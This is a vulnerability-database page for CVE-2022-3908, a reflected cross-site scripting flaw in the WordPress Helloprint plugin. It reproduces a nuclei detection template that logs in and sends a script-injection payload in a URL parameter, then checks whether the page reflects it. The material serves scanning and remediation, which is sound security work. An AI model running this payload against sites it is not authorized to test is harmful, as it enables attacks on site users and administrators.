Lucene search
K

WordPress Helloprint <1.4.7 - Cross-Site Scripting

🗓️ 30 Jun 2026 04:56:11Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 22 Views

WordPress Helloprint <1.4.7 - Cross-Site Scripting vulnerabilit

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2022-3908
12 Dec 202220:21
circl
CNNVD
WordPress plugin Helloprint 跨站脚本漏洞
12 Dec 202200:00
cnnvd
CVE
CVE-2022-3908
12 Dec 202217:54
cve
Cvelist
CVE-2022-3908 Helloprint < 1.4.7 - Reflected Cross-Site Scripting
12 Dec 202217:54
cvelist
NVD
CVE-2022-3908
12 Dec 202218:15
nvd
OSV
CVE-2022-3908
12 Dec 202218:15
osv
Prion
Cross site scripting
12 Dec 202218:15
prion
Positive Technologies
PT-2022-24713 · WordPress · Helloprint Wordpress Plugin
12 Dec 202200:00
ptsecurity
RedhatCVE
CVE-2022-3908
22 May 202523:21
redhatcve
Vulnrichment
CVE-2022-3908 Helloprint < 1.4.7 - Reflected Cross-Site Scripting
12 Dec 202217:54
vulnrichment
Rows per page
id: CVE-2022-3908

info:
  name: WordPress Helloprint <1.4.7 - Cross-Site Scripting
  author: theamanrawat
  severity: medium
  description: |
    WordPress Helloprint plugin before 1.4.7 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, potentially allowing an attacker to execute malicious scripts on the victim's browser.
  remediation: Fixed in version 1.4.7.
  reference:
    - https://wpscan.com/vulnerability/c44802a0-8cbe-4386-9523-3b6cb44c6505
    - https://wordpress.org/plugins/helloprint/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3908
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-3908
    cwe-id: CWE-79
    epss-score: 0.00897
    epss-percentile: 0.55048
    cpe: cpe:2.3:a:helloprint:helloprint:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: helloprint
    product: helloprint
    framework: wordpress
  tags: cve,cve2022,xss,wordpress,wp-plugin,helloprint,wp,authenticated,wpscan,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=language-translate.php&success=added"><script>alert(`XSS`)<%2Fscript> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(content_type_2, "text/html")'
          - 'contains(body_2, "Translation added\\\"><script>alert(`XSS`)</script> successfully")'
        condition: and
# digest: 4b0a00483046022100ffe755ef1622f08669557ceb190a8ac6812c21bbe8b04cd4c66047562f17831a022100efa8428e58cd22631a8f16991227aa86a7cf548f3940210177b48ffd5a39ed1a:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 3.16.1
EPSS0.00897
SSVC
22